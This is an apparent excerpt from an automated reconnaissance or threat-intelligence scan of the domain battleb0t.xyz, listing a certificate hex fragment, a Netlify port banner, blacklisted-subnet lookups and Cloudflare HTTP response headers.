8b:7f:87:4a:7e:42:aa:5b:99:9b:ac:a1:20:ef:8a:3a:25:64:
1c:a0:d1:77:e9:b8:80:07:f6:06:a3:d2:6d:a5:d1:dd:94:0d:
f9:e5:86:a9:a6:b8:76:39:cd:1d:fb:3e:ff:83:72:04:4c:2a:
14:fb:7f:65:eb:20:3e:c2:84:49:b5:05:7e:d8:32:30:2d:ef:
38:80:5a:18:e3:cd:59:d6:9f:ac:ee:c8:4b:1a:74:fc:f4:50:
49:af:e3:8f:99:a7:48:63:80:91:24:9e:c4:3b:1d:5f:e7:b4:
1a:3b:17:c3:a0:96:88:b3:17:31:2b:42:d2:5c:02:ce:26:2d:
05:3d:b5:62:e2:53:7c:d1:bc:6c:3b:50:e7:fe:06:7f:f3:8c:
c1:45:7a:6f:01:d6:e5:6b:4c:b1:72:55:a1:cc:c8:79:92:38:
80:4e:bb:ab:bb:48:59:61:91:04:3d:4f:6a:29:7c:c3:ea:6b:
3b:30:22:90:a8:7e:7e:06:d7:9e:99:8b:4b:c9:e9:df:59:76:
1a:71:60:d4:87:0d:e1:27:92:03:31:f8:a9:32:a1:14:b5:ce:
97:e4:9e:4f
| battleb0t.xyz |
| 2023-05-12 02:54:20 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H04BK0BS0X0MXB72Y8AY7JTF
Date: <REDACTED>
Content-Length: 0
| 2600:1f18:2489:8200::c8 |
| 2023-05-12 03:00:48 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.66): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.222): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c599e10cab22234-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.6.166 |